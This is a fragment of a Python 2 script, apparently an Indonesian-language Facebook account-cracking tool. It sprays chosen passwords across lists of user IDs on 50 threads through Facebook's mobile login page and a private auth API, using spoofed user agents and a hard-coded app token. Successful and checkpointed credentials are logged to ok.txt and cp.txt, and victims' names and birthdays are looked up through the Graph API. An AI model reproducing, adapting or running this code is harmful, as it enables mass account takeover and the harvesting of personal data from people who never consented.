	'Mozilla/5.0 (Series40; NokiaC2-06/06.96; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.2.0.0.33',
	'Mozilla/5.0 (X11; CrOS i686 4319.74.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36',
	'Mozilla/5.0 (Mobile; Windows Phone 8.1; Android 4.0; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 929) like iPhone OS 7_0_3 Mac OS X AppleWebKit/537 (KHTML, like Gecko) Mobile Safari/537',
	'Mozilla/5.0 (Linux; U; Android 2.3; en-us) AppleWebKit/999+ (KHTML, like Gecko) Safari/999.9',
	'Opera/9.80 (Windows Phone; Opera Mini/8.1.0/37.6334; U; en) Presto/2.12.423 Version/12.16', 'Mozilla/5.0 (Mobile; ALCATELOneTouch4019A; rv:28.0) Gecko/28.0 Firefox/28.0'])
				rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pw, 'login': 'submit'}, headers={'user-agent': ua})
				xo = rex.content
				if 'mbasic_logout_button' in xo or 'save-device' in xo:
					print('\r  \033[0;92m* --> ' +uid+ '|' + pw + '       ')
					ok.append(uid+'|'+pw)
					save = open('ok.txt','a') 
					save.write('  * --> '+str(uid)+'|'+str(pw)+'\n')
					save.close()
					break
					continue
				if 'checkpoint' in xo:
					try:
						token = open('login.txt').read()
						url = ("https://graph.facebook.com/"+uid+"?access_token="+token)
						data = s.get(url).json()
						ttl = data['birthday'].replace("/","-")
						nama = data['name']
						print('\r  \033[0;93m* --> ' +uid+ '|' + pw + '|' + ttl)
						cp.append(uid+'|'+pw+'|'+ttl)
						save = open('cp.txt','a') 
						save.write('  * --> '+str(uid)+'|'+str(pw)+'|'+ttl+'\n')
						save.close()
						break
					except(KeyError, IOError):
						ttl = " "
					except:pass
					print('\r  \033[0;93m* --> ' +uid+ '|' + pw + '       ')
					cp.append(uid+'|'+pw)
					save = open('cp.txt','a') 
					save.write('  * --> '+str(uid)+'|'+str(pw)+'\n')
					save.close()
					break
					continue
					
			loop += 1
		except:
			pass
	p = ThreadPool(50)
	p.map(main, id)
	exit("\n \033[0;97m[\033[0;96m#\033[0;97m] Finished")

def manual():
	pw = raw_input(" \033[0;97m[\033[0;92m*\033[0;97m] Set Password : ")
	#print("\n \033[0;97m[\033[0;93m*\033[0;97m] Crack With Password : \033[0;91m%s"%(pw))
	print ('')
	if len(pw) ==0:
		exit(" \033[0;97m[\033[0;91m!\033[0;97m] Don't Be Empty")
	
	def main(user):
		global loop, token
		#sys.stdout.write('\r \033[0;97m[\033[0;93m*\033[0;97m] Crack %s/OK:%s CP:%s ' % (loop, len(ok), len(cp))
		sys.stdout.write('\r\033[1;97m [\033[1;92m%s\033[1;97m]' %(loop)
		); sys.stdout.flush()
		try:os.mkdir("results")
		except OSError:pass
		uid,name=user.split("[-]")
		ss = name.split(" ")
		try:
			os.mkdir('results')
		except OSError:
			pass
		try:
			for asu in pw.split(","):
				ua = 'Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4X Build/MiUI MS; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/65.0.3325.109 Mobile Safari/537.36 Instagram 38.0.0.13.95 Android (24/7.0; 480dpi; 1080x1920; Xiaomi/xiaomi; Redmi Note 4X; mido; qcom; ru_RU; 99640911)'
				rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': asu, 'login': 'submit'}, headers={'user-agent': ua})
				xo = rex.content
				if 'mbasic_logout_button' in xo or 'save-device' in xo:
					print('\r [OK] '+uid+ '|' + asu + '       ')
					ok.append(uid+'|'+asu)
					save = open('ok.txt','a') 
					save.write('  * --> '+str(uid)+'|'+str(asu)+'\n')
					save.close()
					break
					continue
				if 'checkpoint' in xo:
					try:
						token = open('login.txt').read()
						url = ("https://graph.facebook.com/"+uid+"?access_token="+token)
						data = s.get(url).json()
						nama = data['name']
						ttl = data['birthday'].replace("/","-")
						print('\r  \033[0;93m[CP] ' +uid+ '|' + asu + '|' + ttl)
						cp.append(uid+'|'+asu+'|'+ttl)
						save = open('cp.txt','a') 
						save.write('  * --> '+str(uid)+'|'+str(asu)+'|'+ttl+'\n')
						save.close()
						break
					except(KeyError, IOError):
						ttl = ' '
					except:pass
					print('\r  [CP] ' +uid+ '|' + asu + '       ')
					cp.append(uid+'|'+asu)
					save = open('cp.txt','a') 
					save.write('  * --> '+str(uid)+'|'+str(asu)+'\n')
					save.close()
					break
					continue
			
			loop += 1
		except:
			pass
	p = ThreadPool(50)
	p.map(main, id)
	print ("\n \033[0;97m[\033[0;96m#\033[0;97m] Selesai")
	ik = raw_input("\n \033[0;97m[*] Crack Lagi? Y/t : ")
	if ik == "Y" or ik == "y":
		manual()
	exit()
	
def manuapi():
	pw = raw_input(" \033[0;97m[\033[0;92m*\033[0;97m] Set Password : ")
	#print("\n \033[0;97m[\033[0;93m*\033[0;97m] Crack With Password : \033[0;91m%s"%(pw))
	print ('')
	if len(pw) ==0:
		exit(" \033[0;97m[\033[0;91m!\033[0;97m] Don't Be Empty")
	
	def main(user):
		global loop, token
		#sys.stdout.write('\r \033[0;97m[\033[0;93m*\033[0;97m] Crack %s/OK:%s CP:%s ' % (loop, len(ok), len(cp))
		sys.stdout.write('\r\033[1;97m [\033[1;92m%s\033[1;97m]' %(loop)
		); sys.stdout.flush()
		try:os.mkdir("results")
		except OSError:pass
		uid,name=user.split("[-]")
		ss = name.split(" ")
		try:
			os.mkdir('results')
		except OSError:
			pass
		try:
			for asu in pw.split(","):
				ua = 'Mozilla/5.0 (Linux; Android 7.0; SM-G610M Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/197.0.0.46.98;]'
				headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 
               'x-fb-net-hni': str(random.randint(20000, 40000)), 
               'x-fb-connection-quality': 'EXCELLENT', 
               'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 
               'user-agent': ua, 
               'content-type': 'application/x-www-form-urlencoded', 
               'x-fb-http-engine': 'Liger'}
				ses=requests.Session()
				api="https://b-api.facebook.com/method/auth.login"
				param={"access_token": "350685531728%7C62f8ce9f74b12f84c123cc23437a4a32","format": "JSON","sdk_version": "2","email":uid,"locale": "en_US","password":asu,"sdk": "ios","generate_session_cookies": "1","sig": "3f555f99fb61fcd7aa0c44f58f522ef6"}
				send=ses.get(api,params=param, headers=headers_)
				if "session_key" in send.text and "EAAA" in send.text:
					print('\r [OK] '+uid+ '|' + asu + '       ')
					ok.append(uid+'|'+asu)
					save = open('ok.txt','a') 
					save.write('  * --> '+str(uid)+'|'+str(asu)+'\n')
					save.close()
					break
					continue
				elif "www.facebook.com" in send.json()["error_msg"]:
					try:
						token = open('login.txt').read()
						url = ("https://graph.facebook.com/"+uid+"?access_token="+token)
						data = s.get(url).json()
						nama = data['name']
						ttl = data['birthday'].replace("/","-")
						print('\r  \033[0;93m[CP] ' +uid+ '|' + asu + '|' + ttl)
						cp.append(uid+'|'+asu+'|'+ttl)
						save = open('cp.txt','a') 
						save.write('  * --> '+str(uid)+'|'+str(asu)+'|'+ttl+'\n')
						save.close()
						break
					except(KeyError, IOError):
						ttl = ' '
					except:pass
					print('\r  [CP] ' +uid+ '|' + asu + '       ')
					cp.append(uid+'|'+asu)
					save = open('cp.txt','a') 
					save.write('  * --> '+str(uid)+'|'+str(asu)+'\n')
					save.close()
					break
					continue
			
			loop += 1
		except:
			pass
	p = ThreadPool(50)
	p.map(main, id)
	print ("\n \033[0;97m[\033[0;96m#\033[0;97m] Selesai")
	ik = raw_input("\n \033[0;97m[*] Crack Lagi? Y/t : ")
	if ik == "Y" or ik == "y":
		manual()
	exit()
						
						
						
			
				
				
				
				

if __name__=='__main__':
	token = open('login.txt', 'r').read()
	crack()
